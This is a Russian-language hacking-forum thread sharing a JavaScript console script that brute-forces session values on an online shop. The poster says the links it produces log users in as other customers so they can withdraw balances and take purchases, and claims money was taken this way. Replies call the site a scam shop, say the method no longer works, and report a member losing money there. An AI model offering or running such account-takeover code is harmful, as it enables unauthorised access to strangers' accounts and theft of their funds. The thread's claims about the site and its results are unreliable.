[Слив темы] Получаем аккаунты с балансом на вывод

[Слив темы] Получаем аккаунты с балансом на вывод

Статус
В этой теме нельзя размещать новые ответы.

pro-lekha2014

ПРЕМИУМ
ПОЛЬЗОВАТЕЛЬ
Статус
Вне сети
Реакции
26
Тема слита с Хайда не будет, т.к у вас на форуме новичок и надеюсь получить неплохую репутацию. Сразу с места в карьер:

Переходим на сайт: неа не переходим))

Открываем консоль разработчика:

• Chrome/Opera: CTRL + SHIFT + J
  • Firefox: CTRL + SHIFT + K
Вводим js код для брута аккаунтов:

КОД:
function start(){setTimeout(function(){$.get("lоgin.php?sys=session",function(t){t.indexOf("mb_log")>=0&&($("#check").html("Проверяется: "+t),$.get("login.php?check="+t,function(n){n.indexOf("true")>=0&&$("#log").append('<a target="_blank" href="login.php?hash='+t+'">https://darkshop.cc/...n.php?hash=' t " купленных товаров" +"</a><br>")}))}),setTimeout(function(){start()},1)},5e3)}$(".content").html('<div id="check"></div><br><b>Валидные аккаунты: </b><div id="log"></div>'),start(),nA();
Если появилась подобная надпись:
"Проверяется: JCYJEitKXD"

Значит брут еще работает и через минуту начнут появляться ссылки для авторизации (после перехода по ссылке, нас авторизирует под чужим акком и нам будет доступен вывод денег и купленные товары)

DarkShop_cc.png

== ДОПОЛНИТЕЛЬНАЯ ИНФОРМАЦИЯ ==

За час было получено 23 аккаунта, выведено 430 рублей.

Актуально на: 26.11.2017

Так же на аккаунтах можно найти много полезной инфы (Купленные аккаунты вк, рабочие темы для заработка и.т.д). Буду вкидывать в тему валидные акки ВК которые нашел.

ПОПРОБУЙТЕ, ИНТЕРЕСНЫЙ РАЗВОД, ТОЛЬКО НИЧЕГО НЕ ПОКУПАЙТЕ

На всякий случай повторюсь, ПОПРОБУЙТЕ, ИНТЕРЕСНЫЙ РАЗВОД, ТОЛЬКО НИЧЕГО НЕ ПОКУПАЙТЕ

Ранее читал такое, даже пробовал сам. Кстати она у вас и не под хайдом) Прочесть любой может.

И вроде уже не работает.

Вложения

• Screenshot_1.png
    Screenshot_1.png
    9 КБ · Просмотры: 5
Я позавчера лоханулся, 33 $ ушло,грамотный развод, пусть люди не повторяют моих ошибок.

К какому сайту относится?

Разводной шоп. Закрыто.

Статус
В этой теме нельзя размещать новые ответы.
Активность
Пока что здесь никого нет
Назад
Сверху Снизу